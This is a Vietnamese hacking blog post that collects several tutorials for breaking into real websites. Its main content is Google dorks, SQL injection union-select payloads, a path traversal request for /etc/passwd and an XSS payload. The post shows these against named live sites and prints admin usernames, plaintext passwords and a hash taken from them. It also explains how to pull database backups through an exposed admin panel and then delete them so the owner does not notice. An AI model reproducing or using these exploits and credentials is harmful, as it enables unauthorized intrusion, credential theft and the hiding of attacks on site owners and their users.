Hack
lâu quá không tham gia post bài,bữa nay ngạo mạn viết bài này cho chi tiết một chút cho anh em kiểm nghiêm nhé........(from :milw0rm).Bug này cực ký nguy hiểm,hàng ngàn site dùng chung mã nguồn này,chính vì thế a-e không nên làm hại đến SoftbizScripts.nghiêm cấm mọi hình thức deface nhé.
====Lõi này là SQL injection chắc các cụ đều biết cả nhỉ
bắt đầu nhé :
bước 1:
vào http://www.google.com.vn/
nhập vào từ khóa : allinurl: "store_info.php?id="
Ồ nó ra cả tá thế này biết chọn cái nào nhỉ he he
http://www.google.com.vn/search?q=allinurl:++%22store_info.php%3Fid%3D%22&hl=vi&lr=&as_qdr=all&start=30&sa=N
chọn cái này thử nhé :
http://www.pets4sale.com.au/store_info.php?id=40
heh he
bước 2:
thay số 40 bằng đoạn nầy
999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,p wd,18,19,20,21,22/**/from/**/sbclassified_admin/*
thì nó sẽ ra như thế này:
http://www.pets4sale.com.au/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*
ặc ặc nó ra cái gì thế này
ở trên là user :admin
dưới là pass1l0t-99
hehe
bây giờ sao đây
dằng nhập trực tiếp,,.....heheh nó dụ mình chẳng qua đăng nhập trức tiếp là cho mấy thằng ngu đăng ký của nó để nó hốt tiền đây,chẳng qua mấy thằng này chỉ là một user chảng có quyền gì heheh
bước 3:
đánh đừong đãn này
http://www.pets4sale.com.au/admin/
woa nó ra giao diễn đăng nhập của admin cớ đấy
đăng nhập vào bằng user và pass trên.....
sau đó thì contact cho admin nhé.....................
chúc a-e vui...............
Nhớ contact cho admin.....
trong lỗi này thì có thằng http://mangraovat.net/ cũng dùng source này,tuy nhien nó fix rùi nhưng mà vẫn còn,a-e cứ coi kỹ một chút,không tiện nói ra nhé......hehe
================================================================================
Có lẽ mình có duyên với SQL injection.
bấy giờ tớ chỉ chỉ cái link thui nhé
lên google search bằng cái từ khóa này nhé:
allinurl: "searchresult.php?sbcat_id="
rùi sao nhìu thế này nhỉ heeeeeeeeeu
chán we......hhuuuuuuuuuuuu
==>két quả http://www.google.com.vn/search?q=allinurl:++%22searchresult.php%3Fsbcat_id%3D%22&hl=vi&lr=&as_qdr=all&start=30&sa=N
tớ chọn cái site này nhé
http://www.cookbrazil.com/searchresult.php?sbcat_id=3
rùi thay số 149 trên thanh Address bằng đoạn này nhé 999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,s badmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
Okie
Nó ra cái này :http://www.cookbrazil.com/searchresult.php?sbcat_id=999999%20union/**/select/**/0,sbadmin_name,2,3,4,5,6,7,8,9,10,11,12,13,14,15,s badmin_pwd,17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
tớ thấy userr và pass rùi
username :amdin
passsao dài thế nhỉ):T*taxov2007
Okie bi giờ login để chiếm quyền kiếm soát nhé :
http://www.cookbrazil.com/admin/
đăng nhập bằng user và pass ở trên:
Thế là okie
soucre code from milw0rm.com
================================================================================
google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy.
Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants
1. http://www.eduaffiliates.com/admin/dump sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy.
Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao.
2. Tạo file backup
- http://www.eduaffiliates.com/admin/backupstart.php click vào nút Backup
a. Quay lại: http://www.eduaffiliates.com/admin/dump sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it.
b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql thay ngày tháng năm theo giờ sever nhé.
c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql
3. Xóa dấu vết
Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql
COMPLETED - Bản quyền H2P
================================================================================
Bug này milw0rm.com search không có đâu nha
Code:
Search in google : "powered by Mini-nuke"
url scripting : http://www.victime.com/pages.asp?id=3%20un...+where+uye_id=1
EXAMPLE :
my victim : http://www.er-rufai.com/
url scripting :
http://www.er-rufai.com/pages.asp?id=3%20u...+where+uye_id=1
admin : Nizamettin
pass ( hash MD5 ) : 251dda522000d30ebf4dc5631157b5cf
Chỉ ảnh hưởng với version 2.3
ví dụ như của E sau khi search thế này: www.bilgiyerim.com
sau đó E paste cái code này vào: pages.asp?id=3%20u...+where+uye_id=1 trở thành thế này: http://www.bilgiyerim.com/pages.asp?id=3%20u...+where+uye_id=1
nó hiện thông báo thế này :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'p_id = 3 u... where uye_id=1'.
/pages.asp, line 13
thế thì làm sao E có user và pass như câc A đã nói.
================================================================================
Theo như định dạng của các bug SQL injection tui đã giời thiệu các bug khác trên forum,bữa nay cũng là dạng này các bạn dùng theo thứ tự như trong mấy cái bug trước,các bạn thay làm sao cho phù hợp nhé......
Lên google search : "browsecats.php?cid="
Step 1:
Tìm cái user: dùng dòng lệnh
999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
Tìm pass:999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
login bằng cách:http://sitename/admin/
em xin demo thử một trang đã bị hack bởi KGB gì đó rồi
http://www.informatycy.info/browsecats.php?cid=-1+union+select+0,sb_admin_name,2,3+from+sbjbs_admin/*
user: admin
http://www.informatycy.info/browsecats.php?cid=-1+union+select+0,sb_pwd,2,3+from+sbjbs_admin/*
pass: hiphop0
trang login:http://www.informatycy.info/admin/
http://www.milw0rm.com/exploits/4504
==============================
vuln code
| line 544: |
| if (!isset($_REQUEST['page'])){ |
| $_REQUEST['page']=$homepage; |
| $cpage=$_REQUEST['page']; |
| } else { $cpage=$_REQUEST['page']; } |
| |
| line 646: |
| if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
| if (file_exists("pages/".$cpage.".htm")){ |
| include("pages/".$cpage.".htm"); |
| } |
| else include("pages/".$cpage.".html"); |
| } |
|
Exploit : ?page=/../../../../../../../etc/passwd%00
Demo : http://www.doopthemes.com/?page=/../../../../../../../etc/passwd%00
==============================
Google search với từ khóa là: inurl:/webmail/index.php?lid=
Expolit của nó là: index.php?lid=de&tid=modern_blue&f_user=&six=&f_em ail=[XSS]
Ví dụ : https://955jazz.com:81/webmail/index.php?lid=6&tid=1&f_user=&six=&f_email=%22%3E%3Ch1%3ENull%20Code%20Services%3C/h1%3E=%22%3E%3Ciframe%20src=http://www.google.com/%3E%3C/iframe%3E
================================================================================
bữa nay buồn buồn lên ghé qua milw0rm.com tháy có cái SQL Injection liền check thử.........không ngờ ..............
thấy nó chuối quá liền viết một cái tut cho anh em học hỏi nhau.....
Tính đem vào "thi" mà thấy kỳ quá ...... nên thui,đành viết tut vậy.
Do thường những lỗi SQL injection này thì mỗi khi chúng có một bug nào đó trên source thì bao nhiêu site sử dụng cái source này đều bị.bởi thực sự những Cty hay những người viết code ra khi viết code cho khách hàng họ chỉ edit lại chứ không viết hoàn toàn từ a-z nên chính vì thế chúng ta có thể đánh sập tất cả các site nào sử dụng mã nguồn này.
nói liên thiên quá đi sâu vào vấn đề nhé:
Bắt đầu nào :
Step1:
vào google tìm theo từ khóa:
allinurl: "/kategori.asp?kat="(tìm bằng cách này sẽ đảm bảo hơn rằng những site này dùng cùng một source code)
trên Address:nó sẽ trở thành
http://www.google.com.vn/search?q=allinurl:++%22/kategori.asp%3Fkat%3D%22&hl=vi&lr=&as_qdr=all&star t=60&sa=N
woa woa..............nhiều thế.chọn cái site sau cho chắc ăn tức là trang 7,8 gì đấy..........thử trang bất kỳ coi thử:
tớ chọn trang này nhé :
http://sdelican.info/web/kategori.asp?kat=goster&id=4
bi giờ tớ thử thay 4 bằng doạn mã này :-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
note for code:phần này là lấy ra cái field tên là adkulltừ trong bảng ayar.
,mấy field 0,1,3,4,5,6,7,8 các bạn không cần quan tâm là field gì,chỉ sử lý field adkull là field tên user đăng nhập....
Okie.
Tức là nó sẽ trở thành thế này :http://sdelican.info/web/kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
Nhấn Enter phát xem nó ra cái gì đây..................
Bùm bùm ...........á a..........á............bùm bùm................á .........áh bùm ...á.....bùm........á...........
Step2:
Nó hiện giữa màn hình là những cái gì đây.......chẳng cần biết
các bạn chỉ quan tâm sdelican....đây là thằng user đây....
Okie...biết được thằng user rùi....mình kiếm pass của thằng này phát xẻm có được không nhé :
Step 3:trở lại ban đầu thay thằng 4 bằng thằng
=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar Okie nhé
nó sẽ ra như thế này:http://sdelican.info/web/kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar
Ồ hố..............enter phát xem nào....................
ặc ặc nó ra cái gì nữa thế
pass hkông mã hóa hehe
allah165651--
ngon đây biết user và pass rùi mình làm sao nhỉ,chẳng bít có chỗ nào dể dùng thứ của nợ mần mò từ nãy đến giờ,hóa ra làm công không ah.......bỏ đi....thui chẳng làm nữa.....nhưng thui thử cái coi hên xui...........
đánh thử thêm thằng admin đằng sau xem nó có đúng đường dẫn không nào :http://sdelican.info/admin
Enter mọt phát:
Not Found
The requested document was not found on this server.
chán thế không phải rùi...
thử phát nữa chứ làm kiểu này nổi tình tò mò rùi,đánh
http://sdelican.info/web/admin/ phát,rùi Enter một phát.................á á................có màn hình để xài thằng kia rùi.
Step4
Bi giờ thử dùng user và pass trên coi như thế nào nhỉ,Enter phát xem sao....hehhe vào đựoc admin rùi thành công rùi..................hahhaaaaa.
Hên thế lâu lâu gặp quả hên mừng thía..........nhờ mấy anh em chỉ bảo thếm nữa nhé,tớ làm chưa đúng chỗ nào xin thỉnh giáo nhé.
0 Nhận xét:
Đăng nhận xét
Đăng ký Đăng Nhận xét [Atom]
<< Trang chủ